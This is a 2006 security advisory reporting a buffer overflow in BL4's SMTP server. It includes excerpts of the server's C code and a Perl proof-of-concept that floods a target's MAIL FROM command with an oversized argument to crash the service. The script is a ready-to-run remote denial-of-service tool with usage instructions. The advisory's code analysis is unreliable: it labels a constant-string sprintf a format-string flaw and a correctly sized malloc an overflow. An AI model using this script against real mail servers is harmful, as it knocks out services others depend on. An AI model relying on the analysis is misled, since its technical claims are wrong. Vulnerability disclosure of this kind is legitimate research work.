BL4's SMTP server BufferOverflow Vulnerable
---------------------------------------------------------------------------
[ECHO_ADV_30$2006] BL4's SMTP server BufferOverflow Vulnerable
---------------------------------------------------------------------------
Author : Dedi Dwianto
Date : April, 27th 2006
Location : Indonesia, Jakarta
Web : http://advisories.echo.or.id/adv/adv30-theday-2006.txt
Critical Lvl : High
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : BL4's SMTP server
version : < 0.1.5
URL : http://bl4qkubartnndfhr.emmeya.com/prog/smtp?0
Description :
BL4's SMTP server is an inbound only SMTP server.
It currently uses hardcoded values for handling email.
The SMTP server puts the incoming email into various text files.
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~~~
BL4's SMTP server is to a flaw that can allow remote attacker to
cause a denial of service or a attacker can Execution of Arbitrary Code.
The vulnerability is due to a buffer overflow in the SMTP service.
A remote attacker can repeatedly send more that 2100 bytes as the argument to
the HELO, MAIL FROM, and RCPT TO commands to crash the server.
------------------think.c-----------------------------------
...........
{
slaveEmail[x]->isData = 0;
slaveEmail[x]->emailFrom = 0;
slaveEmail[x]->emailTo = 0;
free(buffer);
buffer = malloc(sizeof(char) * 12);
sprintf(buffer, "250 OK\r\n");
return buffer;
}
free(buffer);
.............
slaveEmail[x]->EHLO = buffer;
slaveEmail[x]->EHLOtrue = 1;
buffer = malloc(sizeof(char) * 12);
sprintf(buffer, "250 OK\r\n");
return buffer;
-----------------------------------------------------------
--
sprintf(buffer, "250 OK\r\n");
--
Vulnerable for format strings.
--
free(buffer);
buffer = malloc(sizeof(char) * 12);
--
Vulnerable for buffer overflow.
A attacker can create Arbitrary Code here .
Poc:
~~~~~~~~~~~~
#!/usr/bin/perl
use IO::Socket;
use Socket;
my($socket) = "";
if($#ARGV < 1 | $#ARGV > 2) {usage()}
if($#ARGV > 2) { $prt = $ARGV[1] } else { $prt = "25" };
$adr = $ARGV[0];
$prt = $ARGV[1];
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";
print " -- Connecting To SMTP server at $adr port $prt ... \n";
sleep(1);
print $socket "EHLO yahoo.com\r\n" and print " -- Sending Request to
$adr .....\n" or die "Error : can't send Request\n";
sleep(1);
print $socket "MAIL FROM:" . "jessy" x 4600 . "\r\n" and print " --
Sending Buffer to $adr .....\n";
sleep(1);
printf("[+]Ok!\n");
printf("[+]Crash service.....\n");
printf("[~]Done.\n");
close($socket);
sub usage()
{
print "\n=========================================\r\n";
print " BL4's SMTP server Remote DOS \r\n";
print "=========================================\r\n";
print " Bug Found by Dedi Dwianto \r\n";
print " www.echo.or.id #e-c-h-o irc.dal.net \r\n";
print " Echo Security Research Group \r\n";
print "=========================================\r\n";
print " Usage: perl bl4-explo.pl [target] [port] \r\n\n";
exit();
}
---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous
~ newbie_hacker@xxxxxxxxxxxxxxx
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~
Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id
Homepage: http://theday.echo.or.id/
-------------------------------- [ EOF ] ----------------------------------